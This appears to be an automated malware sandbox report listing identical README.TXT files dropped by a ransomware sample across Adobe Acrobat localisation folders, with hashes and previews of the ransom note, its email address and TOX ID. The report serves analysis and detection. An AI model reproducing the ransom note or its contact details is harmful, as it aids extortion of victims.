                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
